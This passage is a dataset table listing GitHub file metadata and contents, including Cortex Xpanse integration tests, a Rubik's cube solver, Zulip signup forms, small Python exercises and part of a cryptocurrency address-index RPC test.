blob_id (string, length 40) | directory_id (string, length 40) | path (string, length 3 to 616) | content_id (string, length 40) | detected_licenses (sequence, length 0 to 112) | license_type (string, 2 classes) | repo_name (string, length 5 to 115) | snapshot_id (string, length 40) | revision_id (string, length 40) | branch_name (string, 777 classes) | visit_date (timestamp[us], 2015-08-06 10:31:46 to 2023-09-06 10:44:38) | revision_date (timestamp[us], 1970-01-01 02:38:32 to 2037-05-03 13:00:00) | committer_date (timestamp[us], 1970-01-01 02:38:32 to 2023-09-06 01:08:06) | github_id (int64, 4.92k to 681M, nullable) | star_events_count (int64, 0 to 209k) | fork_events_count (int64, 0 to 110k) | gha_license_id (string, 22 classes) | gha_event_created_at (timestamp[us], 2012-06-04 01:52:49 to 2023-09-14 21:59:50, nullable) | gha_created_at (timestamp[us], 2008-05-22 07:58:19 to 2023-08-21 12:35:19, nullable) | gha_language (string, 149 classes) | src_encoding (string, 26 classes) | language (string, 1 class) | is_vendor (bool, 2 classes) | is_generated (bool, 2 classes) | length_bytes (int64, 3 to 10.2M) | extension (string, 188 classes) | content (string, length 3 to 10.2M) | authors (sequence, length 1) | author_id (string, length 1 to 132)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2210ae26b179ba05004cd58b2a1d034630f3c058 | 0d55bde6f4784f6dea9e8e6945d05bbf627e1e7d | /Packs/CortexXpanse/Integrations/CortexXpanse/CortexXpanse_test.py | e5e1f54f5d007d64c3a3a149c6753ca5a12fdbdf | [
"MIT"
] | permissive | crestdatasystems/content | d7040415431b5d06d1569433a49869afcb0292bd | 5f0f00840c39f028dca8377551bbd725d8ee8a2d | refs/heads/master | 2023-08-16T19:35:38.150912 | 2023-07-11T05:59:59 | 2023-07-11T05:59:59 | 280,669,011 | 2 | 1 | MIT | 2023-03-10T16:00:35 | 2020-07-18T14:06:44 | Python | UTF-8 | Python | false | false | 11,965 | py | """
Tests module for Cortex Xpanse integration.
"""
def test_format_asm_id_func(requests_mock):
"""Tests format_asm_id helper function.
Given:
- Mock JSON pre-formatting from the list_asset_internet_exposure_command function
When:
- Sending JSON to format_asm_id function.
Then:
- Checks the output of the helper function with the expected output.
"""
from CortexXpanse import format_asm_id
from test_data.raw_response import INTERNET_EXPOSURE_PRE_FORMAT
from test_data.expected_results import INTERNET_EXPOSURE_POST_FORMAT
response = format_asm_id(INTERNET_EXPOSURE_PRE_FORMAT)
assert response == INTERNET_EXPOSURE_POST_FORMAT
def test_list_external_service_command(requests_mock):
"""Tests list_external_service_command command function.
Given:
- requests_mock instance to generate the appropriate list_external_service_command API response,
loaded from a local JSON file.
When:
- Running the 'list_external_service_command'.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, list_external_service_command
from test_data.raw_response import EXTERNAL_SERVICES_RESPONSE
from test_data.expected_results import EXTERNAL_SERVICES_RESULTS
requests_mock.post('https://test.com/api/webapp/public_api/v1/assets/get_external_services/',
json=EXTERNAL_SERVICES_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
args = {
'domain': 'testdomain.com',
}
response = list_external_service_command(client, args)
assert response.outputs == EXTERNAL_SERVICES_RESULTS
assert response.outputs_prefix == 'ASM.ExternalService'
assert response.outputs_key_field == 'service_id'
def test_get_external_service_command(requests_mock):
"""Tests get_external_service_command command function.
Given:
- requests_mock instance to generate the appropriate get_external_service_command API response,
loaded from a local JSON file.
When:
- Running the 'get_external_service_command'.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, get_external_service_command
from test_data.raw_response import EXTERNAL_SERVICE_RESPONSE
from test_data.expected_results import EXTERNAL_SERVICE_RESULTS
requests_mock.post('https://test.com/api/webapp/public_api/v1/assets/get_external_service',
json=EXTERNAL_SERVICE_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
args = {
'service_id': '94232f8a-f001-3292-aa65-63fa9d981427'
}
response = get_external_service_command(client, args)
assert response.outputs == EXTERNAL_SERVICE_RESULTS
assert response.outputs_prefix == 'ASM.ExternalService'
assert response.outputs_key_field == 'service_id'
def test_list_external_ip_address_range_command(requests_mock):
"""Tests list_external_ip_address_range_command function.
Given:
    - requests_mock instance to generate the appropriate list_external_ip_address_range_command API response,
loaded from a local JSON file.
When:
- Running the 'list_external_ip_address_range_command'.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, list_external_ip_address_range_command
from test_data.raw_response import EXTERNAL_RANGES_RESPONSE
from test_data.expected_results import EXTERNAL_RANGES_RESULTS
requests_mock.post('https://test.com/api/webapp/public_api/v1/assets/get_external_ip_address_ranges/',
json=EXTERNAL_RANGES_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
args = {}
response = list_external_ip_address_range_command(client, args)
assert response.outputs == EXTERNAL_RANGES_RESULTS
assert response.outputs_prefix == 'ASM.ExternalIpAddressRange'
assert response.outputs_key_field == 'range_id'
def test_get_external_ip_address_range_command(requests_mock):
"""Tests get_external_ip_address_range_command function.
Given:
    - requests_mock instance to generate the appropriate get_external_ip_address_range_command API response,
loaded from a local JSON file.
When:
- Running the 'get_external_ip_address_range_command'.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, get_external_ip_address_range_command
from test_data.raw_response import EXTERNAL_RANGE_RESPONSE
from test_data.expected_results import EXTERNAL_RANGE_RESULTS
requests_mock.post('https://test.com/api/webapp/public_api/v1/assets/get_external_ip_address_range/',
json=EXTERNAL_RANGE_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
args = {
'range_id': '1093124c-ce26-33ba-8fb8-937fecb4c7b6'
}
response = get_external_ip_address_range_command(client, args)
assert response.outputs == EXTERNAL_RANGE_RESULTS
assert response.outputs_prefix == 'ASM.ExternalIpAddressRange'
assert response.outputs_key_field == 'range_id'
def test_list_asset_internet_exposure_command(requests_mock):
"""Tests list_asset_internet_exposure_command function.
Given:
    - requests_mock instance to generate the appropriate list_asset_internet_exposure_command API response,
loaded from a local JSON file.
When:
- Running the 'list_asset_internet_exposure_command'.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, list_asset_internet_exposure_command
from test_data.raw_response import EXTERNAL_EXPOSURES_RESPONSE
from test_data.expected_results import EXTERNAL_EXPOSURES_RESULTS
requests_mock.post('https://test.com/api/webapp/public_api/v1/assets/get_assets_internet_exposure/',
json=EXTERNAL_EXPOSURES_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
args = {
'name': 'testdomain.com'
}
response = list_asset_internet_exposure_command(client, args)
assert response.outputs == EXTERNAL_EXPOSURES_RESULTS
assert response.outputs_prefix == 'ASM.AssetInternetExposure'
assert response.outputs_key_field == 'asm_ids'
def test_get_asset_internet_exposure_command(requests_mock):
"""Tests get_asset_internet_exposure_command function.
Given:
    - requests_mock instance to generate the appropriate get_asset_internet_exposure_command API response,
loaded from a local JSON file.
When:
- Running the 'get_asset_internet_exposure_command'.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, get_asset_internet_exposure_command
from test_data.raw_response import EXTERNAL_EXPOSURE_RESPONSE
from test_data.expected_results import EXTERNAL_EXPOSURE_RESULTS
requests_mock.post('https://test.com/api/webapp/public_api/v1/assets/get_asset_internet_exposure/',
json=EXTERNAL_EXPOSURE_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
args = {
'asm_id': 'testdomain.com'
}
response = get_asset_internet_exposure_command(client, args)
assert response.outputs == EXTERNAL_EXPOSURE_RESULTS
assert response.outputs_prefix == 'ASM.AssetInternetExposure'
assert response.outputs_key_field == 'asm_ids'
def test_list_alerts_command(requests_mock):
"""Tests list_alerts_command function.
Given:
    - requests_mock instance to generate the appropriate list_alerts_command API response,
loaded from a local JSON file.
When:
- Running the 'list_alerts_command'.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, list_alerts_command
from test_data.raw_response import LIST_ALERTS_RESPONSE
from test_data.expected_results import LIST_ALERTS_RESULTS
requests_mock.post('https://test.com/api/webapp/public_api/v1/alerts/get_alerts/',
json=LIST_ALERTS_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
args = {
'limit': '2',
'severity': 'high',
'sort_by_creation_time': 'asc'
}
response = list_alerts_command(client, args)
assert response.outputs == LIST_ALERTS_RESULTS
assert response.outputs_prefix == 'ASM.Alert'
assert response.outputs_key_field == 'alert_id'
def test_fetch_incidents(requests_mock, mocker):
"""Tests fetch_incidents function.
Given:
    - requests_mock instance to generate the appropriate fetch_incidents API response,
loaded from a local JSON file.
When:
- Running the 'fetch_incidents' command.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, fetch_incidents
import json
from test_data.raw_response import LIST_ALERTS_RESPONSE
requests_mock.post('https://test.com/api/webapp/public_api/v1/alerts/get_alerts/',
json=LIST_ALERTS_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
last_run = {'last_fetch': 1659452708759}
next_run, incidents = fetch_incidents(
client=client,
max_fetch=2,
last_run=last_run,
first_fetch_time=1658452708759,
severity=None)
assert len(incidents) == 2
assert incidents[0]['name'] == "Networking Infrastructure"
assert json.loads(incidents[0]['rawJSON']).pop('local_insert_ts')
assert next_run == {'last_fetch': 1659452809020}
| [
"[email protected]"
] | |
8f7769ef093d5beca0d0d32a1807271d4d0060da | 761dbc29537f2271d7cac5ee55bf818cf3d94ee3 | /solver_methods.py | 6b2949e8036f047c4f0b16af10481ba7603d3b16 | [] | no_license | k-off/Rubik_brute_force | ee5d78d22ff72ecd312129787571635cd1f6d3fe | 8688a9e66f8b2d40afe46a449a2b830c5b461e6e | refs/heads/master | 2022-03-07T10:43:56.580884 | 2019-10-22T08:09:32 | 2019-10-22T08:09:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,791 | py | #******************************************************************************#
# #
# :::::::: #
# solver_methods module :+: :+: #
# +:+ #
# By: pacovali <[email protected]> +#+ #
# +#+ #
# Created: 2019/01/01 00:00:00 by pacovali #+# #+# #
# Updated: 2019/01/01 00:00:00 by pacovali ######## odam.nl #
# #
#******************************************************************************#
import numpy as np
from Rubik_class import Rubik
MAX_MOVES = 20;
def compare_cubes(self) :
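    # True only when every face of the scrambled cube matches the reference (solved) cube.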
return (np.array_equal(self.reference.F, self.mixed.F) and
np.array_equal(self.reference.R, self.mixed.R) and
np.array_equal(self.reference.B, self.mixed.B) and
np.array_equal(self.reference.L, self.mixed.L) and
np.array_equal(self.reference.U, self.mixed.U) and
np.array_equal(self.reference.D, self.mixed.D));
def check_iterator(i, skip) :
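    # skip is the index block (i // 3) of the previous move; returning True prunes redundant consecutive moves from that block.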
if skip < 0 :
return (False);
if (skip % 2 == 0 and i // 3 == skip) :
return (True);
    if (skip % 2 == 1 and (skip - (i // 3) == 1 or skip - (i // 3) == 0)) :
return (True);
return (False);
def try_next(self, current_move_nr, allowed, inverse, solution, skip) :
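    # Depth-first search: apply each allowed move, recurse while below the current depth limit,
    # then undo the move with its inverse rotations before trying the next candidate.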
current_move_nr += 1;
i = 0;
for move in allowed :
if check_iterator(i, skip) == False:
solution = np.append(solution, move);
self.mixed.choose_rotation(move);
is_equal = compare_cubes(self);
if is_equal == True:
return (np.array([True, solution]));
if is_equal == False and current_move_nr < self.peak_moves:
result = try_next(self, current_move_nr, allowed, inverse, solution, i // 3);
if (result[0] == True):
return (result);
for inv in inverse[i]:
self.mixed.choose_rotation(inv);
solution = np.delete(solution, -1);
i += 1;
current_move_nr -= 1;
return (np.array([False, solution]));
def solve(self):
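    # Iterative deepening: raise the move limit one at a time (up to MAX_MOVES) until a solution is found.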
solution = np.array([]);
solved = [False, solution];
while self.peak_moves < MAX_MOVES and solved[0] == False:
self.peak_moves += 1;
solved = try_next(self, 0, self.allowed, self.inverse, solution, -1);
if (solved[0] == True):
return (solved[1]); | [
"[email protected]"
] | |
76d96db4057deeca5c0be5158343d8ae8cd74e65 | e281ce2330656a6a0a7f795f535f78881df8b5ba | /Web/HelloWorld/Web1.py | e2342cf62a0c93cdd44e45b46e6c6ee836e8d8c8 | [] | no_license | sunruihua0522/SIG-PyCode | 70db0b57bbf9ce35dc42bd8de62c5bb56a2e888e | 483a67bf679f54ab7405c2362d9cfe47daa2bc0f | refs/heads/master | 2020-07-12T14:46:32.588227 | 2020-04-02T04:37:02 | 2020-04-02T04:37:02 | 204,842,675 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | from flask import Flask, Request
app =Flask(__name__)
@app.route('/')
def HelloWold():
return 'Hello World'
@app.route('/login/')
def Login():
return 'Login......'
@app.route('/login/<int:id>/')
def LoginWithVar(id):
return '<h1>Welcome %d to my world !</h1>'%id
@app.route("/foo/<string:username>/")
def foo(username):
return "loginSteing %s"%username
app.run(host ='0.0.0.0', port = 8080)
| [
"--global"
] | --global |
71f98b5c6f7a6e09c70a177a86d013d601ea80b4 | 8f1137592d670ce134821106f736e231b03ead87 | /mmdet/models/backbones/__init__.py | bed1d549993cacc78bc9d11bcb4b03efddd934ac | [
"MIT"
] | permissive | mousecpn/DMC-Domain-Generalization-for-Underwater-Object-Detection | fa426c834fa2a5cd2fe98c50dd4dfeda64fcdc79 | 133797cfb7553557fb81a37e3c99c88154a13765 | refs/heads/master | 2023-05-23T16:49:34.795363 | 2023-02-13T02:23:31 | 2023-02-13T02:23:31 | 501,597,077 | 16 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,070 | py | # Copyright (c) OpenMMLab. All rights reserved.
from .csp_darknet import CSPDarknet
from .darknet import Darknet
from .detectors_resnet import DetectoRS_ResNet
from .detectors_resnext import DetectoRS_ResNeXt
from .hourglass import HourglassNet
from .hrnet import HRNet
from .mobilenet_v2 import MobileNetV2
from .pvt import PyramidVisionTransformer, PyramidVisionTransformerV2
from .regnet import RegNet
from .res2net import Res2Net
from .resnest import ResNeSt
from .resnet import ResNet, ResNetV1d
from .resnext import ResNeXt
from .ssd_vgg import SSDVGG
from .swin import SwinTransformer
from .trident_resnet import TridentResNet
from .hiddenMixupResnet1 import HiddenMixupResNet,ContrastiveHiddenMixupResNet
__all__ = [
'RegNet', 'ResNet', 'ResNetV1d', 'ResNeXt', 'SSDVGG', 'HRNet',
'MobileNetV2', 'Res2Net', 'HourglassNet', 'DetectoRS_ResNet',
'DetectoRS_ResNeXt', 'Darknet', 'ResNeSt', 'TridentResNet', 'CSPDarknet',
'SwinTransformer', 'PyramidVisionTransformer', 'PyramidVisionTransformerV2','ContrastiveHiddenMixupResNet','HiddenMixupResNet'
]
| [
"[email protected]"
] | |
9eb0eefa8a96b1ade59c85a7d02aab823056e1af | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/119/usersdata/239/27344/submittedfiles/al1.py | 6c815196c1dc7bc1a3f761f112f9ee81f7fa36b9 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 298 | py | # -*- coding: utf-8 -*-
print("Programa de conversão de temperatura: °C -> °F")#Nome de apresentação do aplicativo
print("")
C = float(input("Digite a temperatura em °C:"))#Declarando a entrada
F = ((9*C)+160)/5#Processamento
print("O valor em °F é: %.2f"%F)#Linha para apresentar a saída
| [
"[email protected]"
] | |
b650ce40f2448c5bb65139c22519be4c58cbe7dc | 2af9c17cf29a9bba3f3e714c861e8f89ee5fc488 | /python code/HR33_itertools_product.py | f9633579a94bd1807b00e7a86ee8e8966bd4a1e5 | [] | no_license | Binay28/Binay-s_Code | 9df3315bf9433d62a3b2228ea3f87be93917e5b3 | 7e05c39a753fab79a4518119d41953827dba10c9 | refs/heads/master | 2022-11-18T16:00:19.325948 | 2020-07-16T12:16:38 | 2020-07-16T12:16:38 | 198,006,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | from itertools import product
A=list(map(int,input().split()))
B=list(map(int,input().split()))
print(*product(A,B))
#product(A, B) returns the same as ((x,y) for x in A for y in B)
| [
"[email protected]"
] | |
d0f753d2a8be20ef8fd60993a5117e1ad9ed3bfe | 1d928c3f90d4a0a9a3919a804597aa0a4aab19a3 | /python/zulip/2016/12/forms.py | b2be52e7bd7ffa58c1133a0a90f5faa3a8bbd5a4 | [] | no_license | rosoareslv/SED99 | d8b2ff5811e7f0ffc59be066a5a0349a92cbb845 | a062c118f12b93172e31e8ca115ce3f871b64461 | refs/heads/main | 2023-02-22T21:59:02.703005 | 2021-01-28T19:40:51 | 2021-01-28T19:40:51 | 306,497,459 | 1 | 1 | null | 2020-11-24T20:56:18 | 2020-10-23T01:18:07 | null | UTF-8 | Python | false | false | 9,035 | py | from __future__ import absolute_import
from django import forms
from django.conf import settings
from django.contrib.auth.forms import SetPasswordForm, AuthenticationForm, \
PasswordResetForm
from django.core.exceptions import ValidationError
from django.core.urlresolvers import reverse
from django.db.models.query import QuerySet
from django.utils.translation import ugettext as _
from jinja2 import Markup as mark_safe
from zerver.lib.actions import do_change_password, is_inactive, user_email_is_unique
from zerver.lib.name_restrictions import is_reserved_subdomain, is_disposable_domain
from zerver.lib.utils import get_subdomain, check_subdomain
from zerver.models import Realm, get_user_profile_by_email, UserProfile, \
get_realm_by_email_domain, get_realm_by_string_id, \
get_unique_open_realm, email_to_domain, email_allowed_for_realm
from zproject.backends import password_auth_enabled
import logging
import re
import DNS
from typing import Any, Callable, Optional, Text
MIT_VALIDATION_ERROR = u'That user does not exist at MIT or is a ' + \
u'<a href="https://ist.mit.edu/email-lists">mailing list</a>. ' + \
u'If you want to sign up an alias for Zulip, ' + \
u'<a href="mailto:[email protected]">contact us</a>.'
WRONG_SUBDOMAIN_ERROR = "Your Zulip account is not a member of the " + \
"organization associated with this subdomain. " + \
"Please contact %s with any questions!" % (settings.ZULIP_ADMINISTRATOR,)
def get_registration_string(domain):
# type: (Text) -> Text
register_url = reverse('register') + domain
register_account_string = _('The organization with the domain already exists. '
'Please register your account <a href=%(url)s>here</a>.') % {'url': register_url}
return register_account_string
def email_is_not_mit_mailing_list(email):
# type: (Text) -> None
"""Prevent MIT mailing lists from signing up for Zulip"""
if "@mit.edu" in email:
username = email.rsplit("@", 1)[0]
# Check whether the user exists and can get mail.
try:
DNS.dnslookup("%s.pobox.ns.athena.mit.edu" % username, DNS.Type.TXT)
except DNS.Base.ServerError as e:
if e.rcode == DNS.Status.NXDOMAIN:
raise ValidationError(mark_safe(MIT_VALIDATION_ERROR))
else:
raise
class RegistrationForm(forms.Form):
full_name = forms.CharField(max_length=100)
# The required-ness of the password field gets overridden if it isn't
# actually required for a realm
password = forms.CharField(widget=forms.PasswordInput, max_length=100,
required=False)
realm_name = forms.CharField(max_length=100, required=False)
realm_subdomain = forms.CharField(max_length=40, required=False)
realm_org_type = forms.ChoiceField(((Realm.COMMUNITY, 'Community'),
(Realm.CORPORATE, 'Corporate')),
initial=Realm.COMMUNITY, required=False)
if settings.TERMS_OF_SERVICE:
terms = forms.BooleanField(required=True)
def clean_realm_subdomain(self):
# type: () -> str
if settings.REALMS_HAVE_SUBDOMAINS:
error_strings = {
'too short': _("Subdomain needs to have length 3 or greater."),
'extremal dash': _("Subdomain cannot start or end with a '-'."),
'bad character': _("Subdomain can only have lowercase letters, numbers, and '-'s."),
'unavailable': _("Subdomain unavailable. Please choose a different one.")}
else:
error_strings = {
'too short': _("Short name needs at least 3 characters."),
'extremal dash': _("Short name cannot start or end with a '-'."),
'bad character': _("Short name can only have lowercase letters, numbers, and '-'s."),
'unavailable': _("Short name unavailable. Please choose a different one.")}
subdomain = self.cleaned_data['realm_subdomain']
if not subdomain:
return ''
if len(subdomain) < 3:
raise ValidationError(error_strings['too short'])
if subdomain[0] == '-' or subdomain[-1] == '-':
raise ValidationError(error_strings['extremal dash'])
if not re.match('^[a-z0-9-]*$', subdomain):
raise ValidationError(error_strings['bad character'])
if is_reserved_subdomain(subdomain) or \
get_realm_by_string_id(subdomain) is not None:
raise ValidationError(error_strings['unavailable'])
return subdomain
class ToSForm(forms.Form):
terms = forms.BooleanField(required=True)
class HomepageForm(forms.Form):
email = forms.EmailField(validators=[is_inactive])
def __init__(self, *args, **kwargs):
# type: (*Any, **Any) -> None
self.realm = kwargs.pop('realm', None)
super(HomepageForm, self).__init__(*args, **kwargs)
def clean_email(self):
# type: () -> str
"""Returns the email if and only if the user's email address is
allowed to join the realm they are trying to join."""
email = self.cleaned_data['email']
if get_unique_open_realm():
return email
# Otherwise, the user is trying to join a specific realm.
realm = self.realm
if realm is None and not settings.REALMS_HAVE_SUBDOMAINS:
realm = get_realm_by_email_domain(email)
if realm is None:
if settings.REALMS_HAVE_SUBDOMAINS:
raise ValidationError(_("The organization you are trying to join does not exist."))
else:
raise ValidationError(_("Your email address does not correspond to any existing organization."))
if realm.invite_required:
raise ValidationError(_("Please request an invite from the organization administrator."))
if not email_allowed_for_realm(email, realm):
raise ValidationError(
_("The organization you are trying to join, %(string_id)s, only allows users with e-mail "
"addresses within the organization. Please try a different e-mail address."
% {'string_id': realm.string_id}))
if realm.is_zephyr_mirror_realm:
email_is_not_mit_mailing_list(email)
return email
def email_is_not_disposable(email):
# type: (Text) -> None
if is_disposable_domain(email_to_domain(email)):
raise ValidationError(_("Please use your real email address."))
class RealmCreationForm(forms.Form):
# This form determines whether users can create a new realm.
email = forms.EmailField(validators=[user_email_is_unique, email_is_not_disposable])
class LoggingSetPasswordForm(SetPasswordForm):
def save(self, commit=True):
# type: (bool) -> UserProfile
do_change_password(self.user, self.cleaned_data['new_password1'],
log=True, commit=commit)
return self.user
class ZulipPasswordResetForm(PasswordResetForm):
def get_users(self, email):
# type: (str) -> QuerySet
"""Given an email, return matching user(s) who should receive a reset.
This is modified from the original in that it allows non-bot
users who don't have a usable password to reset their
passwords.
"""
if not password_auth_enabled:
logging.info("Password reset attempted for %s even though password auth is disabled." % (email,))
return []
result = UserProfile.objects.filter(email__iexact=email, is_active=True,
is_bot=False)
if len(result) == 0:
logging.info("Password reset attempted for %s; no active account." % (email,))
return result
class CreateUserForm(forms.Form):
full_name = forms.CharField(max_length=100)
email = forms.EmailField()
class OurAuthenticationForm(AuthenticationForm):
def clean_username(self):
# type: () -> str
email = self.cleaned_data['username']
try:
user_profile = get_user_profile_by_email(email)
except UserProfile.DoesNotExist:
return email
if user_profile.realm.deactivated:
error_msg = u"""Sorry for the trouble, but %s has been deactivated.
Please contact %s to reactivate this group.""" % (
user_profile.realm.name,
settings.ZULIP_ADMINISTRATOR)
raise ValidationError(mark_safe(error_msg))
if not check_subdomain(get_subdomain(self.request), user_profile.realm.subdomain):
logging.warning("User %s attempted to password login to wrong subdomain %s" %
(user_profile.email, get_subdomain(self.request)))
raise ValidationError(mark_safe(WRONG_SUBDOMAIN_ERROR))
return email
| [
"[email protected]"
] | |
548e6b996617ab7253f3a41fa7c7838b9df2aad1 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /qeyinsjZHCPEddbfe_3.py | 101cca3e7846d04b82b150f8b95efd2e70cbf0e5 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py |
def dice_game(lst):
result = [0 if x == y else x + y for x, y in lst]
if 0 in result:
return 0
else:
return sum(result)
| [
"[email protected]"
] | |
52d55eaa96a718f0192d07bd30328853a449ba83 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02419/s944531801.py | 0470606a21cac3803c17734548ec73c240969efd | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 131 | py | W=raw_input()
T=[]
while 1:
x=raw_input()
if x=="END_OF_TEXT": break
T+=[v.lower() for v in x.split()]
print T.count(W) | [
"[email protected]"
] | |
058384b59e30522de87ae1f0a3b05a247b264dd1 | c0ba52c370f3c41471308588d49ae75f975d9b49 | /qa/rpc-tests/addressindex.py | bf539ced19ceecddb492dd85fbce51b93697576f | [
"MIT"
] | permissive | mirzaei-ce/core-aghilbit | 7f318a7487675ef7a38280d7b19284c3227cea52 | 4a4ce7b0da3fe01246f300a6809cda68d0708ef6 | refs/heads/master | 2021-07-12T08:21:29.796955 | 2017-10-16T16:56:05 | 2017-10-16T16:56:05 | 107,156,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,755 | py | #!/usr/bin/env python2
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test addressindex generation and fetching
#
import time
from test_framework.test_framework import AghilbitTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
import binascii
class AddressIndexTest(AghilbitTestFramework):
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 4)
def setup_network(self):
self.nodes = []
# Nodes 0/1 are "wallet" nodes
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug", "-relaypriority=0"]))
self.nodes.append(start_node(1, self.options.tmpdir, ["-debug", "-addressindex"]))
# Nodes 2/3 are used for testing
self.nodes.append(start_node(2, self.options.tmpdir, ["-debug", "-addressindex", "-relaypriority=0"]))
self.nodes.append(start_node(3, self.options.tmpdir, ["-debug", "-addressindex"]))
connect_nodes(self.nodes[0], 1)
connect_nodes(self.nodes[0], 2)
connect_nodes(self.nodes[0], 3)
self.is_network_split = False
self.sync_all()
def run_test(self):
print "Mining blocks..."
self.nodes[0].generate(105)
self.sync_all()
chain_height = self.nodes[1].getblockcount()
assert_equal(chain_height, 105)
assert_equal(self.nodes[1].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 0)
# Check that balances are correct
balance0 = self.nodes[1].getaddressbalance("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br")
assert_equal(balance0["balance"], 0)
# Check p2pkh and p2sh address indexes
print "Testing p2pkh and p2sh address index..."
txid0 = self.nodes[0].sendtoaddress("mo9ncXisMeAoXwqcV5EWuyncbmCcQN4rVs", 10)
self.nodes[0].generate(1)
txidb0 = self.nodes[0].sendtoaddress("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br", 10)
self.nodes[0].generate(1)
txid1 = self.nodes[0].sendtoaddress("mo9ncXisMeAoXwqcV5EWuyncbmCcQN4rVs", 15)
self.nodes[0].generate(1)
txidb1 = self.nodes[0].sendtoaddress("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br", 15)
self.nodes[0].generate(1)
txid2 = self.nodes[0].sendtoaddress("mo9ncXisMeAoXwqcV5EWuyncbmCcQN4rVs", 20)
self.nodes[0].generate(1)
txidb2 = self.nodes[0].sendtoaddress("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br", 20)
self.nodes[0].generate(1)
self.sync_all()
txids = self.nodes[1].getaddresstxids("mo9ncXisMeAoXwqcV5EWuyncbmCcQN4rVs")
assert_equal(len(txids), 3)
assert_equal(txids[0], txid0)
assert_equal(txids[1], txid1)
assert_equal(txids[2], txid2)
txidsb = self.nodes[1].getaddresstxids("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br")
assert_equal(len(txidsb), 3)
assert_equal(txidsb[0], txidb0)
assert_equal(txidsb[1], txidb1)
assert_equal(txidsb[2], txidb2)
# Check that limiting by height works
print "Testing querying txids by range of block heights.."
height_txids = self.nodes[1].getaddresstxids({
"addresses": ["2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br"],
"start": 105,
"end": 110
})
assert_equal(len(height_txids), 2)
assert_equal(height_txids[0], txidb0)
assert_equal(height_txids[1], txidb1)
# Check that multiple addresses works
multitxids = self.nodes[1].getaddresstxids({"addresses": ["2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br", "mo9ncXisMeAoXwqcV5EWuyncbmCcQN4rVs"]})
assert_equal(len(multitxids), 6)
assert_equal(multitxids[0], txid0)
assert_equal(multitxids[1], txidb0)
assert_equal(multitxids[2], txid1)
